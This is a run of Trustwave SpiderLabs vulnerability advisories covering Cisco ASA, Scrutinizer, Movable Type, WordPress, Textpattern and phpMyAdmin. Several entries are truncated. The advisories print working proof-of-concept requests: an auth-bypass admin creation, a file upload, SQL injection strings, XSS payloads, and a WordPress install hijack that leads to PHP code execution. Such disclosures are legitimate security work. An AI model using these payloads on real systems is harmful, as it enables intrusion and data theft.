TWSL2013-004: Group Name Enumeration Vulnerability in Cisco IKE Implementation
Trustwave SpiderLabs Security Advisory TWSL2013-004: Group Name Enumeration Vulnerability in Cisco IKE Implementation https://www.trustwave.com/spiderlabs/advisories/TWSL2013-004.txt Published: 04/18/13 Version: 1.0 Vendor: Cisco (www.cisco.com) Product: ASA (Adaptive Security Appliance) Versions affected: 8.4(2), 8.4(5), 9.1(1) Product description: The Cisco ASA 5505 Adaptive Security Appliance is a next-generation, full-featured security appliance for small business, branch office, and enterprise teleworker environments. The Cisco ASA 5505 delivers high-performance firewall, SSL and IPsec VPN, and rich networking services in a modular, plug-and-play appliance. Finding 1: Group Name Enumeration Credit: Daniel Turner of Trustwave SpiderLabs CVE: CVE-2013-1194 CWE: CWE-206 Each VPN configuration is assigned a group name, which is used to manage separate Security Associations. Previous advisories have found that when a VPN endpoint is configured to allow Aggressive Mode IKE negotiations using PSK, a hash of the PSK can be captured and potentially cracked offline. In order to successfully crack this hash a correct group name is required. The above product versions are susceptible to a group name enumeration vulnerability, because of a difference in the way the device responds to correct and incorrect group names sent in the initial exchange packet. Similar to CSCeg00323 and CSCtj96108 where this was possible because of no response and a response with a DPD payload respectively. It has been found that it remains possible to distinguish a correct group name by the number of response packets sent by the device. A correct group name elicits three attempts to continue the handshake and an additional encrypted phase 2 packet, while the device will only respond twice to an incorrect group. Enumeration is slow because of the requirement to wait for the responding packets, but this has been successfully accomplished. Below are examples of the different responses: Example 1: #Request using invalid group name ike-scan 10.70.70.25 -M -A --id=incorrectgroup #Response using invalid group name 13:22:59.929273 IP 10.70.70.204.isakmp 10.70.70.25.isakmp: isakmp: phase 1 I agg 13:22:59.932624 IP 10.70.70.25.isakmp 10.70.70.204.isakmp: isakmp: phase 1 R agg 13:23:05.696571 IP 10.70.70.25.isakmp 10.70.70.204.isakmp: isakmp: phase 1 R agg Example 2: #Request using valid group name ike-scan 10.70.70.25 -M -A --id=correctgroup #Response using valid group name 13:23:05.693673 IP 10.70.70.204.isakmp 10.70.70.25.isakmp: isakmp: phase 1 I agg 13:23:13.690392 IP 10.70.70.25.isakmp 10.70.70.204.isakmp: isakmp: phase 1 R agg 13:23:21.690464 IP 10.70.70.25.isakmp 10.70.70.204.isakmp: isakmp: phase 1 R agg 13:23:29.690528 IP 10.70.70.25.isakmp 10.70.70.204.isakmp: isakmp: phase 1 R agg 13:23:37.691275 IP 10.70.70.25.isakmp 10.70.70.204.isakmp: isakmp: phase 2/others R inf[E] This information can be used to capture and crack a weak PSK if Aggressive Mode is enabled. Remediation Steps: The vendor will be releasing security fixes to the above issues and affected versions can be patched by installing the 8.4(6) firmware or the 9.1(2) firmware for the Cisco ASA platform. Administrators with other affected firmware versions should be aware that this information could be potentially be revealed and it is recommended that factory default group or easily guessable group names are not used. Additional Credits: Jonathan Claudius of Trustwave SpiderLabs: Confirmation of Vulnerability/Behavior on Cisco ASA 8.4(5) and 9.1(1) Revision History: 02/21/13 - Vulnerability disclosed 03/14/13 - Vendor acknowledges security issue 04/17/13 - Vendor releases security alert 04/18/13 - Advisory published References 1. http://www.cisco.com/warp/public/707/cisco-sn-20050624-vpn-grpname.shtml 2. http://www.cisco.com/en/US/products/csr/cisco-sr-20101124-vpn-grpname.html 3. http://tools.cisco.com/security/center/content/CiscoSecurityNotice/CVE-2013-1194 About Trustwave: Trustwave is the leading provider of on-demand and subscription-based information security and payment card industry compliance management solutions to businesses and government entities throughout the world. For organizations faced with today's challenging data security and compliance environment, Trustwave provides a unique approach with comprehensive solutions that include its flagship TrustKeeper compliance management software and other proprietary security solutions. Trustwave has helped thousands of organizations--ranging from Fortune 500 businesses and large financial institutions to small and medium-sized retailers--manage compliance and secure their network infrastructure, data communications and critical information assets. Trustwave is headquartered in Chicago with offices throughout North America, South America, Europe, Africa, China and Australia. For more information, visit https://www.trustwave.com About Trustwave SpiderLabs: SpiderLabs(R) is
TWSL2012-014: Multiple Vulnerabilities in Scrutinizer NetFlow sFlow Analyzer
Trustwave SpiderLabs Security Advisory TWSL2012-014:
Multiple Vulnerabilities in Scrutinizer NetFlow sFlow Analyzer
Published: 07/27/12
Version: 1.0
Vendor: Plixer International (http://www.plixer.com)
Product: Scrutinizer NetFlow and sFlow Analyzer
Version affected: Confirmed 9.0.1 (Build 9.0.1.19899) and prior versions
may be affected as well. Please note that the software can be found in a
long list of other products. Visit
http://www.plixer.com/Scrutinizer-Netflow-Sflow/scrutinizer.html
for the partial list.
Product description:
Network analysis tool for monitoring the overall network health and reports
on which hosts, applications, protocols, etc. that are consuming network
bandwidth.
Credits:
Mario Ceballos of the Metasploit Project
Jonathan Claudius of Trustwave Spiderlabs
Finding 1: HTTP Authentication Bypass Vulnerability
CVE: CVE-2012-2626
The Scrutinizer web console provides a form-based login facility, requiring
users to authenticate to gain access to further functionality. A tiered
user access model is also used, where administrative and standard users
have a different selection of permissible functions. Authentication and
authorization is controlled by the cookie-based session management system.
Although this is implemented in a standardized way, the session tokens are
not required to perform privileged functions, such as adding users.
Example(s):
This request will add a user named trustwave with the password of
trustwave to the administrative user group.
#Request
POST /cgi-bin/admin.cgi HTTP/1.1
Host: A.B.C.D
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:11.0)
Gecko/20100101 Firefox/11.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Proxy-Connection: keep-alive
Content-Length: 70
tool=userprefsnewUser=trustwavepwd=trustwaveselectedUserGroup=1
#Response
HTTP/1.1 200 OK
Date: Wed, 25 Apr 2012 17:52:15 GMT
Server: Apache
Vary: Accept-Encoding
Content-Length: 19
Content-Type: text/html; charset=utf-8
{new_user_id:2}
Finding 2: Arbitrary File Upload Vulnerability
CVE: CVE-2012-2627
The Scrutinizer web console is prone to unauthenticated arbitrary file upload
vulnerability. An attacker could exploit this vulnerability to upload files
to the affected systems file system as well as overwrite the Scrutinizer
applications SNMP configuration.
Example(s):
This request will upload a test file to the following location:
'C:\Program Files (x86)\Scrutinizer\snmp\mibs\trustwave.txt'
Note: This affected folder also contains SNMP configuration files which could
be overwritten if an attacker were to select the right file name.
#Request
POST /d4d/uploader.php HTTP/1.0
Host: A.B.C.D
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
Content-Type: multipart/form-data; boundary=_Part_949_3365333252_3066945593
Content-Length: 210
--_Part_949_3365333252_3066945593
Content-Disposition: form-data;
name=uploadedfile; filename=trustwave.txt
Content-Type: application/octet-stream
trustwave
--_Part_949_3365333252_3066945593--
#Response
HTTP/1.1 200 OK
Date: Wed, 25 Apr 2012 17:39:15 GMT
Server: Apache
X-Powered-By: PHP/5.3.3
Vary: Accept-Encoding
Content-Length: 41
Connection: close
Content-Type: text/html
{success:1,file_name:trustwave.txt}
#Confirming on File System
C:\type Program Files (x86)\Scrutinizer\snmp\mibs\trustwave.txt
trustwave
Finding 3: Multiple Cross-site Scripting Vulnerabilities in exporters.php and
contextMenu.php
CVE: CVE-2012-3848
The Scrutinizer web console suffers from multiple Cross Site Scripting
vulnerabilities in the following pages:
1.) /d4d/contextMenu.php
2.) /d4d/exporters.php
These vulnerabilities include the following:
1.) XSS via arbitrary parameter
3.) XSS via referrer header
Example(s):
The following two examples will demonstrate the the above mentioned
vulnerabilities on exporters.php
#Request 1
GET /d4d/exporters.php?ascriptalert(123)/script=1 HTTP/1.1
Host: A.B.C.D
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:12.0)
Gecko/20100101 Firefox/12.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Proxy-Connection: keep-alive
#Response 1
snip
a
href=/d4d/exporters.php?ascriptalert(1)/script=1/d4d/exporters.php?ascriptalert(123)/script=1/a/td/tr
snip
#Request 2
GET /d4d/exporters.php HTTP/1.1
Host: A.B.C.D
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://D.E.F.G/search?hl=enq=ascriptalert(123)/script=1
Content-Length: 2
#Response 2
snip
a
href=http://D.E.F.G/search?hl=enq=ascriptalert(123)/script=1http://D.E.F.G/search?hl=enq=ascriptalert(123)/script=1/a
snip
Finding 4: Undocumented Default Admin MySQL Users
CVE: CVE-2012-3951
The Scrutinizer application relies on an underlying Apache, MySQL and PHP
installation which is installed as part of the scrutinizer installer
TWSL2012-008: Multiple Vulnerabilities in Scrutinizer NetFlow sFlow Analyzer
Trustwave SpiderLabs Security Advisory TWSL2012-008:
Multiple Vulnerabilities in Scrutinizer NetFlow sFlow Analyzer
https://www.trustwave.com/spiderlabs/advisories/TWSL2012-008.txt
Published: 04/11/12
Version: 1.0
Vendor: Plixer International (http://www.plixer.com)
Product: Scrutinizer NetFlow and sFlow Analyzer
Version affected: 8.6.2 (8.6.2.16204) confirmed; others may be vulnerable
Product description:
Network analysis tool for monitoring the overall network health and reports
on which hosts, applications, protocols, etc. that are consuming network
bandwidth.
Credit: Tanya Secker of Trustwave SpiderLabs
Finding 1: HTTP Authentication Bypass Vulnerability
CVE: CVE-2012-1258
The Scrutinizer web console provides a form-based login facility, requiring
users to authenticate to gain access to further functionality. A tiered
user access model is also used, where administrative and standard users
have a different selection of permissible functions. Authentication and
authorization is controlled by the cookie-based session management system.
Although this is implemented in a standardized way, the session tokens are
not required to perform privileged functions, such as adding users.
Example:
This request will add a user named trustwave with the password of
trustwave to the administrative user group.
#Request
GET
/cgi-bin/userprefs.cgi?newUser=trustwavepwd=trustwaveselectedUserGroup=1=
HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.2.18)
Gecko/20110614 Firefox/3.6.18 ( .NET CLR 3.5.30729)
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
#Response
HTTP/1.1 200 OK
Date: Thu, 17 Nov 2011 10:19:25 GMT
Server: Apache
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 19
{new_user_id:9}
Finding 2: SQL Injection
CVE: CVE-2012-1259
The Scrutinizer web console is prone to unauthenticated SQL Injection
attacks due to user input not being appropriately validated and passed
directly to the backend. An attacker could exploit this vulnerability to
attempt to gain access to sensitive information within the database or to
perform other attacks on the system.
Example 1:
These requests/responses below show a blind SQL injection vector, where a
proof of concept is used to return a syntactically correct response from
the server (200 OK) followed by an incorrect one (500 Internal Server
Error).
#Request 1
GET
/cgi-bin/scrut_fa_exclusions.cgi?name%3anew28%3a28=onname%3anew7%3a7=onname%3anew27%3a27=onname%3anew13%3a13=onstandalone=name%3anew5%3a5=onname%3anew14%3a14=onname%3anew9%3a9=onuser_id=name%3anew23%3a23=onname%3anew17%3a17=onname%3anew11%3a11=onname%3anew24%3a24=onaddip=')%20AND%20('a'='aname%3anew18%3a18=onname%3anew21%3a21=onname%3anew19%3a19=onname%3anew22%3a22=onnbaupdate=1name%3anew12%3a12=onname%3anew25%3a25=onname%3anew2%3a2=onname%3anew1%3a1=onname%3anew10%3a10=onname%3anew15%3a15=onname%3anew26%3a26=onname%3anew4%3a4=onname%3anew6%3a6=on
HTTP/1.1
Host: 127.0.0.1
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://127.0.0.1/cgi-bin/scrut_fa_exclusions.cgi
#Response 1
HTTP/1.1 200 OK
Date: Tue, 31 Jan 2012 23:51:46 GMT
Server: Apache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 230
#Request 2
GET
/cgi-bin/scrut_fa_exclusions.cgi?name%3anew28%3a28=onname%3anew7%3a7=onname%3anew27%3a27=onname%3anew13%3a13=onstandalone=name%3anew5%3a5=onname%3anew14%3a14=onname%3anew9%3a9=onuser_id=name%3anew23%3a23=onname%3anew17%3a17=onname%3anew11%3a11=onname%3anew24%3a24=onaddip=')%20ANffD%20('a'='aname%3anew18%3a18=onname%3anew21%3a21=onname%3anew19%3a19=onname%3anew22%3a22=onnbaupdate=1name%3anew12%3a12=onname%3anew25%3a25=onname%3anew2%3a2=onname%3anew1%3a1=onname%3anew10%3a10=onname%3anew15%3a15=onname%3anew26%3a26=onname%3anew4%3a4=onname%3anew6%3a6=on
HTTP/1.1
Host: 127.0.0.1
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://127.0.0.1/cgi-bin/scrut_fa_exclusions.cgi
#Response 2
HTTP/1.1 500 Internal Server Error
Date: Tue, 31 Jan 2012 23:52:18 GMT
Server: Apache
Last-Modified: Fri, 17 Dec 2010 02:01:03 GMT
ETag: 90001d93e-448-497918ae295c0
Accept-Ranges: bytes
Content-Length: 1096
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Example 2:
The getPermissionsAndPreferences variable within the following request is
also vulnerable to a blind time-based attack. The example payload included
will result in the server taking a delay of approximately five seconds
before returning a response.
#Request
http://127.0.0.1/cgi-bin/login.cgi?getPermissionsAndPreferences=1%20AND%20SLEEP(5)session_id=OyAOiECuFdtRbEBYnocache=12_13_12_734
Example 3:
TWSL2012-003: Cross-Site Scripting Vulnerability in Movable Type Publishing Platform
Trustwave's SpiderLabs Security Advisory TWSL2012-003:
Cross-Site Scripting Vulnerability in Movable Type Publishing Platform
https://www.trustwave.com/spiderlabs/advisories/TWSL2012-003.txt
Published: 2012-02-24
Version: 1.0
Vendor: Six Apart (http://movabletype.org/)
Product: Movable Type
Version affected: Versions prior to 5.13, 5.07, and 4.38
Product description:
Movable Type is a weblog publishing system developed by the company Six
Apart. The software supports static page generation and includes
functionality, such as managing files, user roles, templates, tags,
categories, and trackback links.
Credit: Jonathan Claudius of Trustwave SpiderLabs
Finding 1: Cross-Site Scripting Vulnerability
CVE: CVE-2012-1262
After extracting the Moveable Type CGI files and source files on to a web
server, but before the application is fully installed, cross-site scripting
vulnerabilities are present in the '/cgi-bin/mt/mt-wizard.cgi' page.
Example(s):
Performing XSS on dbuser parameter
#Request
POST /cgi-bin/mt/mt-wizard.cgi HTTP/1.1
Host: A.B.C.D
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:8.0.1)
Gecko/20100101 Firefox/8.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Proxy-Connection: keep-alive
Referer: http://A.B.C.D/cgi-bin/mt/mt-wizard.cgi
Content-Type: application/x-www-form-urlencoded
Content-Length: 216
__mode=teststep=configureset_static_uri_to=default_language=en-usconfig=dbtype=mysqldbserver=localhostdbname=dbuser=%3Cscript%3Ealert%28%27123%27%29%3C%2Fscript%3Edbpass=testdbpath=dbport=dbsocket=test=1
#Response
--snip---
pConnection error: Access denied for user
'scriptalert('123')/script'@'localhost' (using password: YES) at
/var/www/cgi-bin/mt/extlib/Data/ObjectDriver/Driver/BaseCache.pm line 320
--snip---
Vendor Response: These issues have been addressed as of versions 5.13, 5.07,
and 4.38.
Remediation Steps: Customers should update to the latest version of Movable
publishing platform in order to address these issues. The above issues have
been corrected in versions 5.13, 5.07, and 4.38.
Revision History:
01/11/12 - Vulnerability disclosed
02/21/12 - Patch released
02/24/12 - Advisory published
References
1.
http://www.movabletype.org/2012/02/movable_type_513_507_and_438_security_updates.html
About Trustwave:
Trustwave is the leading provider of on-demand and subscription-based
information security and payment card industry compliance management
solutions to businesses and government entities throughout the world. For
organizations faced with today's challenging data security and compliance
environment, Trustwave provides a unique approach with comprehensive
solutions that include its flagship TrustKeeper compliance management
software and other proprietary security solutions. Trustwave has helped
thousands of organizations--ranging from Fortune 500 businesses and large
financial institutions to small and medium-sized retailers--manage
compliance and secure their network infrastructure, data communications and
critical information assets. Trustwave is headquartered in Chicago with
offices throughout North America, South America, Europe, Africa, China and
Australia. For more information, visit https://www.trustwave.com
About Trustwave's SpiderLabs:
SpiderLabs(R) is the advanced security team at Trustwave focused on
application security, incident response, penetration testing, physical
security and security research. The team has performed over a thousand
incident investigations, thousands of penetration tests and hundreds of
application security tests globally. In addition, the SpiderLabs Research
team provides intelligence through bleeding-edge research and proof of
concept tool development to enhance Trustwave's products and services.
https://www.trustwave.com/spiderlabs
Disclaimer:
The information provided in this advisory is provided as is without
warranty of any kind. Trustwave disclaims all warranties, either express or
implied, including the warranties of merchantability and fitness for a
particular purpose. In no event shall Trustwave or its suppliers be liable
for any damages whatsoever including direct, indirect, incidental,
consequential, loss of business profits or special damages, even if
Trustwave or its suppliers have been advised of the possibility of such
damages. Some states do not allow the exclusion or limitation of liability
for consequential or incidental damages so the foregoing limitation may not
apply.
This transmission may contain information that is privileged, confidential,
and/or exempt from disclosure under applicable law. If you are not the intended
recipient, you are hereby notified that any disclosure, copying, distribution,
or use of the information contained herein (including any reliance thereon) is
STRICTLY PROHIBITED. If you received this
TWSL2012-002: Multiple Vulnerabilities in WordPress
Trustwave's SpiderLabs Security Advisory TWSL2012-002:
Multiple Vulnerabilities in WordPress
https://www.trustwave.com/spiderlabs/advisories/TWSL2012-002.txt
Published: 1/24/12
Version: 1.0
Vendor: WordPress (http://wordpress.org/)
Product: WordPress
Version affected: 3.3.1 and prior
Product description:
WordPress is a free and open source blogging tool and publishing platform
powered by PHP and MySQL.
Credit: Jonathan Claudius of Trustwave SpiderLabs
Finding 1: PHP Code Execution and Persistent Cross Site Scripting
Vulnerabilities via 'setup-config.php' page.
CVE: CVE-2011-4899
The WordPress 'setup-config.php' installation page allows users to install
WordPress in local or remote MySQL databases. This typically requires a user
to have valid MySQL credentials to complete. However, a malicious user can
host their own MySQL database server and can successfully complete the
WordPress installation without having valid credentials on the target system.
After the successful installation of WordPress, a malicious user can inject
malicious PHP code via the WordPress Themes editor. In addition, with control
of the database store, malicious Javascript can be injected into the content
of WordPress yielding persistent Cross Site Scripting.
Proof of Concept:
Servers Involved
A.B.C.D = Target WordPress Web Server
W.X.Y.Z = Malicious User's MySQL Instance
1.) Malicious User hosts their own MySQL instance at W.X.Y.Z on port 3306
2.) Performs POST/GET Requests to Install WordPress into MySQL Instance
Request #1
--
POST /wp-admin/setup-config.php?step=2 HTTP/1.1
Host: A.B.C.D
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:8.0.1)
Gecko/20100101 Firefox/8.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Proxy-Connection: keep-alive
Referer: http://A.B.C.D/wp-admin/setup-config.php?step=1
Cookie: wp-settings-time-1=1322687480; wp-settings-1=m9%3Do
Content-Type: application/x-www-form-urlencoded
Content-Length: 81
dbname=wordpressuname=jsmithpwd=jsmithdbhost=W.X.Y.Zprefix=wp_submit=Submit
Request #2
--
GET /wp-admin/install.php HTTP/1.1
Host: A.B.C.D
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:8.0.1)
Gecko/20100101 Firefox/8.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Proxy-Connection: keep-alive
Referer: http://A.B.C.D/wp-admin/setup-config.php?step=2
Cookie: wp-settings-time-1=1322687480; wp-settings-1=m9%3Do
If-Modified-Since: Wed, 07 Dec 2011 16:03:33 GMT
3.) Get PHP Code Execution
Malicious user edits 404.php via Themes Editor as follows:
?php
phpinfo();
?
Note #1: Any php file in the theme could be used.
Note #2: Depending settings, PHP may be used to execute system commands
on webserver.
Malicious user performs get request of modified page to execute code.
Request
---
GET /wp-content/themes/default/404.php HTTP/1.1
Host: A.B.C.D
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:8.0.1)
Gecko/20100101 Firefox/8.0.1
4.) Get Persistent Cross Site Scripting
Malicious User Injects Malicious Javascript into their own MySQL database
instance
MySQL Query
---
update wp_comments SET
comment_content='scriptalert('123')/script' where comment_content='Hi,
this is a comment.br /To delete \ a comment, just log in and view the
post#039;s comments. There you will have the option to edit or delete
them.';
Non-malicious User Visits Wordpress installation and has Javascript executed on
their browser
Request
---
GET /?p=1 HTTP/1.1
Host: A.B.C.D
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:8.0.1)
Gecko/20100101 Firefox/8.0.1
Finding 2: Multiple Cross Site Scripting Vulnerabilities in
'setup-config.php' page
CVE: CVE-2012-0782
The WordPress 'setup-config.php' installation page allows users to install
WordPress in local or remote MySQL databases. When using this installation page
the user is asked to supply the database name, the server that the database
resides on, and a valid MySQL username and password.
During this process, malicious users can supply javascript within
the dbname, dbhost or uname parameters. Upon clicking the submission
button, the javascript is rendered in the client's browser.
Proof of Concept:
Servers Involved
A.B.C.D = Target WordPress Web Server
Request
---
POST /wp-admin/setup-config.php?step=2 HTTP/1.1
Host: A.B.C.D
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:8.0.1)
Gecko/20100101 Firefox/8.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Proxy-Connection: keep-alive
Referer: http://A.B.C.D/wp-admin/setup-config.php?step=1
Content-Type:
TWSL2012-001: Cross-Site Scripting Vulnerability in Textpattern Content Management System
Trustwave's SpiderLabs Security Advisory TWSL2012-001:
Cross-Site Scripting Vulnerability in Textpattern Content Management System
Published: 1/03/12
Version: 1.0
Vendor: Textpattern (http://textpattern.com/)
Product: Textpattern
Version affected: 4.4.1 before change set 3612
Product description:
Textpattern is an open source content management system originally
developed by Dean Allen. While it is often listed among weblogging tools,
its aim is to be a general-purpose content management system suitable for
deployment in many contexts. Textpattern is written in PHP using a MySQL
database backend.
Credit: Jonathan Claudius of Trustwave SpiderLabs
Finding 1: Cross-Site Scripting Vulnerability
CVE: CVE-2011-5019
After extracting the Textpattern source files on to a web server, but
before the application is fully installed, cross-site scripting
vulnerabilities are present in the '/textpattern/setup/index.php' page.
Example(s):
Performing XSS on ddb parameter
#Request
POST /textpattern/setup/index.php HTTP/1.1
Host: A.B.C.D
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:8.0.1)
Gecko/20100101 Firefox/8.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Proxy-Connection: keep-alive
Referer: http://A.B.C.D/textpattern/setup/index.php
Content-Type: application/x-www-form-urlencoded
Content-Length: 156
duser=blahdpass=dhost=localhostddb=%3Cscript%3Ealert%28%27123%27%29%3C%2
Fscript%3Edprefix=siteurl=A.B.C.DSubmit=nextlang=en-usstep=print
Config
#Response
HTTP/1.1 200 OK
Date: Sat, 10 Dec 2011 02:46:44 GMT
Server: Apache/2.2.15 (CentOS)
X-Powered-By: PHP/5.3.2
Content-Length: 674
Connection: close
Content-Type: text/html; charset=utf-8
snip--
div align=centerpChecking database
connection/ppConnected/ppDatabase
strongscriptalert('123')/script/strong does not exist or your
specified user does not have permission to access it./p
Remediation Steps:
Textpattern change set 3612 includes a fix for this security issue. Upgrade
to the latest version.
Revision History:
12/23/11 - Vulnerability disclosed
12/23/11 - Patch released by vendor
1/03/12 - Advisory published
About Trustwave:
Trustwave is the leading provider of on-demand and subscription-based
information security and payment card industry compliance management
solutions to businesses and government entities throughout the world. For
organizations faced with today's challenging data security and compliance
environment, Trustwave provides a unique approach with comprehensive
solutions that include its flagship TrustKeeper compliance management
software and other proprietary security solutions. Trustwave has helped
thousands of organizations--ranging from Fortune 500 businesses and large
financial institutions to small and medium-sized retailers--manage
compliance and secure their network infrastructure, data communications and
critical information assets. Trustwave is headquartered in Chicago with
offices throughout North America, South America, Europe, Africa, China and
Australia. For more information, visit https://www.trustwave.com
About Trustwave's SpiderLabs:
SpiderLabs(R) is the advanced security team at Trustwave focused on
application security, incident response, penetration testing, physical
security and security research. The team has performed over a thousand
incident investigations, thousands of penetration tests and hundreds of
application security tests globally. In addition, the SpiderLabs Research
team provides intelligence through bleeding-edge research and proof of
concept tool development to enhance Trustwave's products and services.
https://www.trustwave.com/spiderlabs
Disclaimer:
The information provided in this advisory is provided as is without
warranty of any kind. Trustwave disclaims all warranties, either express or
implied, including the warranties of merchantability and fitness for a
particular purpose. In no event shall Trustwave or its suppliers be liable
for any damages whatsoever including direct, indirect, incidental,
consequential, loss of business profits or special damages, even if
Trustwave or its suppliers have been advised of the possibility of such
damages. Some states do not allow the exclusion or limitation of liability
for consequential or incidental damages so the foregoing limitation may not
apply.
This transmission may contain information that is privileged, confidential,
and/or exempt from disclosure under applicable law. If you are not the intended
recipient, you are hereby notified that any disclosure, copying, distribution,
or use of the information contained herein (including any reliance thereon) is
STRICTLY PROHIBITED. If you received this transmission in error, please
immediately contact the sender and destroy the material in its entirety,
whether in electronic or hard copy format.
TWSL2011-019: Cross-Site Scripting Vulnerability in phpMyAdmin
Trustwave's SpiderLabs Security Advisory TWSL2011-019: Cross-Site Scripting Vulnerability in phpMyAdmin https://www.trustwave.com/spiderlabs/advisories/TWSL2011-019.txt Published: 12/22/11 Version: 1.0 Vendor: phpMyAdmin (http://www.phpmyadmin.net/) Product: phpMyAdmin Version affected: 3.4.8 and prior Product description: An open source tool developed in PHP to manage and administer MySQL databases remotely. The web browser interface allows creating, modifying or deleting databases, tables, fields or rows, executing SQL statements, and other database functions. Credit: Jason Leyrer of Trustwave SpiderLabs Finding 1: Cross-Site Scripting (XSS) Vulnerability in Setup Interface CVE: CVE-2011-4782 Affected versions of phpMyAdmin do not sanitize user-supplied server names before displaying them in its Setup Overview. This allows remote attackers to execute arbitrary web scripts or HTML via a crafted request. phpMyAdmin allows users to add database servers via its Setup interface. Since phpMyAdmin doesn't do any input validation on server hostnames when they are entered, it is up to whatever displays these names throughout the application to use htmlspecialchars() (or similar) to sanitize them. phpMyAdmin uses a function called perform_config_checks() to perform a series of compatibility, security and consistency checks on application configuration options. If it finds settings that are contrary to best practices, perform_config_checks() generates messages to be displayed to users at the top of the Setup Overview page. The messages generated for some of these configuration options ($cfg['Servers'][$i]['ssl'], $cfg['Servers'][$i]['extension'], $cfg['Servers'][$i]['auth_type'], $cfg['Servers'][$i]['AllowRoot'], and $cfg['Servers'][$i]['AllowNoPassword']) are constructed using user-supplied hostnames without any sanitization taking place. This can lead to web script being executed when the Setup Overview page is loaded. The following is a Proof of Concept (PoC): 1. Request the Setup interface's index page in order to obtain the phpMyAdmin cookie and the value of 'token', which appears in the response body: Request --- GET /phpmyadmin/setup/index.php HTTP/1.1 Response HTTP/1.1 200 OK Date: Thu, 01 Dec 2011 16:42:17 GMT Server: Apache/2.2.20 (Ubuntu) X-Powered-By: PHP/5.3.6-13ubuntu3.2 Set-Cookie: phpMyAdmin=12l6mt8qnlme3o673h75fuj5a6qijnvf; path=/phpmyadmin/setup/; HttpOnly Expires: Thu, 01 Dec 2011 16:42:17 GMT Cache-Control: no-store, no-cache, must-revalidate, pre-check=0, post-check=0, max-age=0 Last-Modified: Thu, 01 Dec 2011 16:42:17 GMT Set-Cookie: pma_lang=en; expires=Sat, 31-Dec-2011 16:42:17 GMT; path=/phpmyadmin/setup/; httponly X-Frame-Options: SAMEORIGIN X-Content-Security-Policy: allow 'self'; options inline-script eval-script; frame-ancestors 'self'; img-src 'self' data:; script-src 'self' www.phpmyadmin.net Pragma: no-cache Vary: Accept-Encoding Content-Length: 7722 Content-Type: text/html; charset=utf-8 ---snip--- input type=hidden name=token value=5acce3a965bbe9d42ce50bdf3d491ed9 / 2. Input javascript (%3Cscript%3Ealert%28%27XSS%27%29%3B%3C%2Fscript%3E) to the 'Servers-0-host' input field in Add New Server mode, as shown in the postdata of the following request: Request --- POST /phpmyadmin/setup/index.php?phpMyAdmin=12l6mt8qnlme3o673h75fuj5a6qijnvftab_hash=check_page_refresh=1lang=encollation_connection=utf8_general_citoken=5acce3a965bbe9d42ce50bdf3d491ed9page=serversmode=addsubmit=New+server HTTP/1.1 Host: A.B.C.D User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:8.0.1) Gecko/20100101 Firefox/8.0.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip, deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Proxy-Connection: keep-alive Referer: http://A.B.C.D/phpmyadmin/setup/index.php?phpMyAdmin=12l6mt8qnlme3o673h75fuj5a6qijnvftab_hash=check_page_refresh=1lang=encollation_connection=utf8_general_citoken=5acce3a965bbe9d42ce50bdf3d491ed9page=serversmode=addsubmit=New+server Cookie: phpMyAdmin=12l6mt8qnlme3o673h75fuj5a6qijnvf; pma_lang=en Content-Type: application/x-www-form-urlencoded Content-Length: 1430
